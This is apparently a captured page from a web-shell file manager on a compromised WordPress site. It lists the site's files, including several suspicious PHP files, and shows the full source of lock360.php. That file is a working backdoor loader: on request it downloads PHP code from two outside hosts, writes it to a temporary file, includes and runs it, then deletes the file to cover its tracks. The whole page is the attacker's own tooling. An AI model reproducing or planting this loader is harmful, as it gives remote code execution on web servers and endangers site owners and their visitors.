X7ROOT File Manager
Current Path:
/home/rockufqs/elconuco.com.co
home
/
rockufqs
/
elconuco.com.co
/
📁
..
📄
.hcflag
(31 B)
📄
.htaccess
(498 B)
📄
.htaccess.bk
(553 B)
📄
.litespeed_flag
(297 B)
📁
185662
📄
admin.php
(5.24 KB)
📁
cgi-bin
📁
clean-temp
📄
clean-temp.zip
(4.34 GB)
📄
error_log
(7.89 MB)
📄
f.php
(180.3 KB)
📄
license.txt
(19.45 KB)
📄
lock360.php
(1.4 KB)
📄
radio.php
(4.23 KB)
📄
readme.html
(7.23 KB)
📄
wordpress-6.3.5-es_CO.zip
(24.94 MB)
📄
wp-activate.php
(7.04 KB)
📁
wp-admin
📁
wp-adriv
📄
wp-comments-post.php
(2.27 KB)
📄
wp-config-sample.php
(2.94 KB)
📄
wp-config.php
(3.22 KB)
📁
wp-content
📁
wp-includes
📄
wp-links-opml.php
(2.44 KB)
📄
wp-load.php
(3.83 KB)
📄
wp-login.php
(48.28 KB)
📄
wp-mail.php
(8.34 KB)
📄
wp-settings.php
(25 KB)
📄
wp-signup.php
(33.58 KB)
📄
wp-trackback.php
(4.77 KB)
📄
xmlrpc.php
(3.16 KB)
Editing: lock360.php
<?php function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.zvo1.xyz/'); if (!$code) { $code = GC('https://c2.icw7.com/'); } $need = '<' . '?' . 'php'; if (strpos($code, $need) === false) { die('get failed'); } if(function_exists('tmpfile')){ $file_name = tmpfile(); } if($file_name) { fwrite($file_name, $code); $a = stream_get_meta_data($file_name); $file_path = $a['uri']; @include($file_path); fclose($file_name); }else { $file_path = '.c'; file_put_contents($file_path, $code); @include($file_path); } @unlink($file_path); die(); }
Upload File
Create Folder